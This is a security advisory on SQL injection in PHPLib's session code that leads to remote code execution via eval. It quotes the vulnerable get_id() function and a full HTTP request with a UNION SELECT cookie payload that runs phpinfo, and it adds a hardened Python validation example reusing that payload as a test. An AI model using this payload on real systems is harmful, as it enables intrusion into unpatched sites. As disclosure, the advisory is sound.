PHPLib SQL Injection
Vendor: PHPLib
Product: PHPLib
Version: <= 7.4
Website: http://phplib.sourceforge.net/
BID: 16801
CVE: CVE-2006-0887 CVE-2006-2826
OSVDB: 23466
SECUNIA: 16902
Description:
The PHP Base Library, aka PHPLib, is a toolkit for PHP developers supporting them in the development of Web applications. The phpLib codebase can be found in a number of applications available today. Unfortunately some of the session emulation code is vulnerable to SQL Injection issues that in the worst case can lead to remote code execution, by using UNION to select arbitrary php code into an eval call. A new version of PHPLib has been released and users should upgrade their PHPLib libraries as soon as possible.


Remote Code Execution:
There are some serious security issues in phplib's session handling that may allow an attacker to perform a range of attacks such as SQL Injection, and/or Remote Code Execution.
## Propagate the session id according to mode and lifetime.
## Will create a new id if necessary. To take over abandoned sessions,
## one may provide the new session id as a parameter (not recommended).

function get_id($id = "") {
global $HTTP_COOKIE_VARS, $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$this->newid=true;

$this->name = $this->cookiename==""?$this->classname:$this->cookiename;

if ( "" == $id ) {
  $this->newid=false;
  switch ($this->mode) {
    case "get":
      $id = isset($HTTP_GET_VARS[$this->name]) ?
            $HTTP_GET_VARS[$this->name] :
            ( isset($HTTP_POST_VARS[$this->name]) ?
            $HTTP_POST_VARS[$this->name] :
            "") ;
    break;
    case "cookie":
      $id = isset($HTTP_COOKIE_VARS[$this->name]) ?
            $HTTP_COOKIE_VARS[$this->name] : "";
    break;
    default:
      die("This has not been coded yet.");
    break;
  }
}

### do not accept user provided ids for creation
if($id != "" && $this->block_alien_sid) {   # somehow an id was provided by the user
   if($this->that->ac_get_value($id, $this->name) == "") {
      # no - the id doesn't exist in the database: Ignore it!
      $id = "";
   }
}

The above code is from sessions.inc @ lines 85-121. The variable $id gets its value from either GET or COOKIE and is never made safe before being passed to the function ac_get_value(), which uses the variable in a query, thus allowing for SQL Injection. Moreover, it is possible to manipulate the query in a way that php code is returned and passed to a vulnerable eval call.
GET /phplib/pages/index.php3 HTTP/1.1
Host: example.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: Example_Session=' UNION SELECT 'cGhwaW5mbygpOw=='/*
If-Modified-Since: Sat, 18 Feb 2006 18:24:34 GMT
For example, the above request made to the index.php3 script that is shipped with phplib will successfully execute the phpinfo call.
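Hardened counterpart of the get_id()/ac_get_value() logic above, added here as an illustration and not code from PHPLib or the advisory author. It is modelled in Python with an in-memory sqlite table so it runs stand-alone; the table name active_sessions, its columns, the sample row and the assumption that a PHPLib session id is a 32-character md5 hex digest are all assumptions for the example. The id is checked against an allow-list pattern before any database access, and the lookup binds it as a parameter instead of concatenating it into SQL, so the cookie value from the request above is rejected at both layers.

```python
import re
import sqlite3

# Assumption: PHPLib session ids are md5 hex digests (32 lowercase hex chars).
SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")

# Constructed stand-in for PHPLib's active_sessions table; the row is made up.
SAMPLE_ROWS = [
    ("0cc175b9c0f1b6a831c399e269772661", "Example_Session", "c2Vzc2lvbi1kYXRh"),
]


def is_valid_session_id(sid):
    """Allow-list check: anything that is not a well-formed id is rejected outright."""
    return isinstance(sid, str) and SESSION_ID_RE.fullmatch(sid) is not None


def make_session_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE active_sessions (sid TEXT, name TEXT, val TEXT)")
    conn.executemany("INSERT INTO active_sessions VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def ac_get_value(conn, sid, name):
    """Hardened lookup: the id travels only as a bound parameter, never as SQL text."""
    row = conn.execute(
        "SELECT val FROM active_sessions WHERE sid = ? AND name = ?", (sid, name)
    ).fetchone()
    return row[0] if row else ""


def get_id(conn, name, cookie_vars, get_vars, mode="cookie"):
    """Hardened get_id(): resolve the id from cookie or GET, validate, then look it up."""
    source = cookie_vars if mode == "cookie" else get_vars
    sid = source.get(name, "")
    if not is_valid_session_id(sid):
        return ""  # malformed or hostile id: ignore it so a fresh one gets created
    if ac_get_value(conn, sid, name) == "":
        return ""  # unknown id: refuse to adopt it (block_alien_sid behaviour)
    return sid


if __name__ == "__main__":
    db = make_session_db()
    hostile = {"Example_Session": "' UNION SELECT 'cGhwaW5mbygpOw=='/*"}  # cookie from the advisory
    print(repr(get_id(db, "Example_Session", hostile, {})))  # '' : rejected
    known = {"Example_Session": SAMPLE_ROWS[0][0]}
    print(get_id(db, "Example_Session", known, {}))  # the known id is accepted
```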


Solution:
PHPLib 7.4a has been released to address these issues.


Credits:
James Bercegay of the GulfTech Security Research Team